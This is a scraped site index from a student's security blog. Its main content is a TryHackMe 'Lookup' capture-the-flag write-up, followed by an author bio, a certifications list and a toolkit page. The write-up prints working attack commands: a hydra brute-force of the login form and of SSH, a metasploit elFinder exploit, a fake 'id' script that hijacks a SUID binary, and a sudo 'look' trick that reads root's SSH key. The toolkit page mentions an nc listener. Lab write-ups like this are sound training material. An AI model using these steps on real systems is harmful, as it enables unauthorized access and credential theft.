\u0026lt;machine_ip\u0026gt;\ni found there were two ports running\n22 for ssh and 80 for http # Then I tried to take a peek at the page running on port 80 and realized I had to edit my hosts file\nsudo echo \u0026lt;machine_ip\u0026gt; lookup.thm\u0026gt;\u0026gt;/etc/hosts\nthen accessing the webpage I got a login page where I tried default creds [admin:admin].\nbut it didn\u0026rsquo;t work and asked me to try again 3 seconds later.\nThen I used wappalyzer to see which version of apache it is using. It was v 2.4.41 which tried to search for exploits but couldn’t find.\nthen I used hydra tool to gain the password\nhydra -l admin -P ~/Downloads/rockyou.txt lookup.thm http-post-form \u0026quot;/login.php:username=^USER^\u0026amp;password=^PASS^:Wrong password. Please try again.\u0026quot;\nhere, hydra will put up a http-post request, the ‘^USER^’ will be replaced by admin and ‘^PASS^’ will be replaced by rockyou.txt. hydra will then check if the combination returns wrong password, if it doesn’t then it will return us the password\nand i got a password.\ni tried logging in with this but still couldn’t get in. so i tried to find the username for obtained password. i found about login.php from its source code.\nthen i got a username jose\nwith this we can log in to the website.\nand we are redirected to files.lookup.thm which we need to add to our hosts file to access\nwe have two files without locks so i opened them up test file was empty but creds file had smth\nI thought maybe this is ssh login pass but seems like i fell to a rabbit-hole. But we have a user “think”. Then i tried to gather more info from this site and i found this\ni searchsploit elfinder and i found its vunlerabilities\nthen i ran metasploit and searched for it: search elfinder 2.1.48 and got one exploit. i used it and after setting some options i ran it and gained a meterpreter shell\nhere the rhosts should have been files.lookup.thm, which i later corrected and it returned a meterpreter shell. after i got the shell i ran a few commands, we were logged in as www-data. so i looked up how can i escalate my privileges to that of a user. we already have a user called ‘think’, so my first thought was to check for login creds. I ran a find command to search for files with perms 4000\nfind / -perm /4000 2\u0026gt;/dev/null\nhere, the interesting one was /usr/sbin/pwm when i tried to run it, it was searching for .passwords file.\nthen i went on to /tmp directory as it is worldwritable. i created a file named id there. echo -e '#!/bin/bash\\n echo \u0026quot;uid=33(think) gid=33(think) groups=33(think)\u0026quot;' \u0026gt; id\nalso make id an executable file chmod +x id\nthen i ran the /pwm again and got a list of passwords which I saved to a file in my machine. After which i started hydra to bruteforce ssh of ‘think’ user.\nI successfully got the ssh password and logged in.\nthe user flag was just one ls away. following to it I searched for something i could use without root permissions. sudo -l\ndoing this i found look so i went to gtfobins and there it was\nwhat we need is the third one\nLFILE=/root/.ssh/id_rsa sudo look \u0026#39;\u0026#39; \u0026#34;$LFILE\u0026#34; this gives us direct access to .ssh file of root and displays the id_rsa\nI saved this to my machine and gave it perms 600 and sshed to root\nthen root flag is found with just ls\n","date":"27 January 2025","externalUrl":null,"permalink":"/writeups/tryhackme/lookup/","section":"Writeups","summary":"","title":"Lookup","type":"writeups"},{"content":" I am Subeg Suwal (glutto.n) # Hi, I\u0026rsquo;m Subeg Suwal, a cybersecurity student pursuing a BSc. (Hons) in Cybersecurity and Ethical Hacking at Softwarica College of IT and E-Commerce. I focus on penetration testing, exploit development, and CTF challenges.\nAbout Me # Education: BSc. (Hons) Cybersecurity and Ethical Hacking — Softwarica College Certifications: eJPT (eLearnSecurity Junior Penetration Tester) — ID: 177314916 CTF Player: Active competitor representing Team NCA@Nepal — placed 11th at VishwaCTF 2025 Platforms: Regular player on HackTheBox and TryHackMe Focus Areas: Web app pentesting, Active Directory attacks, binary exploitation, CTF challenges Skills # Recon: rustscan, nmap, ffuf, gobuster, feroxbuster Web: SQLi, SSRF, SSTI, LFI, JWT abuse, API security Active Directory: BloodHound, nxc/netexec, Kerberoasting, RBCD, ADCS abuse, DPAPI Exploit Dev: Buffer overflows, ROP chains, format strings, pwntools Pivoting: Chisel, Ligolo-ng Languages: Python, JavaScript, C, HTML, CSS Certifications \u0026amp; Goals # ✅ eJPT — eLearnSecurity Junior Penetration Tester ✅ CCPP — Certified C++ Practitioner Professional (Red Team Leaders) ✅ CCEP — Certified Cybersecurity Educator Professional (Red Team Leaders) ✅ CRTOM — Certified Red Team Operations Management (Red Team Leaders) ✅ CTIGA — Certified Threat Intelligence \u0026amp; Governance Analyst (Red Team Leaders) 🔄 ASCP (API Security Certified Professional) — in progress 🎯 CPTS — Certified Penetration Testing Specialist (planned) Profiles # Platform Handle HackTheBox glutton2 TryHackMe glutto.n GitHub glutton-su LinkedIn Subeg Suwal Discord glutto.n Connect # Email: glutton@subegsuwal.com.np LinkedIn: Subeg Suwal GitHub: glutton-su ","date":"12 December 2024","externalUrl":null,"permalink":"/whoami/","section":"Subeg Suwal","summary":"","title":"whoami??","type":"list"},{"content":"","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":"","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"},{"content":" ","externalUrl":null,"permalink":"/certifications/ccep/","section":"My Certifications","summary":"","title":"CCEP","type":"certifications"},{"content":" ","externalUrl":null,"permalink":"/certifications/ccpp/","section":"My Certifications","summary":"","title":"CCPP","type":"certifications"},{"content":" ","externalUrl":null,"permalink":"/certifications/crtom/","section":"My Certifications","summary":"","title":"CRTOM","type":"certifications"},{"content":" ","externalUrl":null,"permalink":"/certifications/ctiga/","section":"My Certifications","summary":"","title":"CTIGA","type":"certifications"},{"content":" Loading latest CVEs...\n","externalUrl":null,"permalink":"/cve-feed/","section":"Subeg Suwal","summary":"","title":"CVEs","type":"page"},{"content":" CLICK HERE TO VERIFY CREDENTIAL ","externalUrl":null,"permalink":"/certifications/ejpt/","section":"My Certifications","summary":"","title":"eJPT","type":"certifications"},{"content":"","externalUrl":null,"permalink":"/certifications/","section":"My Certifications","summary":"","title":"My Certifications","type":"certifications"},{"content":" glutton-su/SIEM-P2-CW1 Python 0 0 glutton-su/backdoor HTML 0 0 glutton-su/DevSpace This repo contains a web development project called DevSpace JavaScript 1 0 glutton-su/C_program_project C 1 0 ","externalUrl":null,"permalink":"/projects/","section":"Subeg Suwal","summary":"","title":"My Projects","type":"page"},{"content":"","externalUrl":null,"permalink":"/series/","section":"Series","summary":"","title":"Series","type":"series"},{"content":" \u0026#x2663; TOOLKIT v3.0 clear sample log sample b64 recipe clear click ops to add → \u0026#x25B6; bake! inputclear 0 chars0 lines outputcopy→ input 0 chars LHOST LPORT \u0026#x25B6; Generate listener nc -lvnp 4444 filter: all linux windows web ★ stable msfvenom ","externalUrl":null,"permalink":"/tools/","section":"Subeg Suwal","summary":"","title":"Tools","type":"page"}]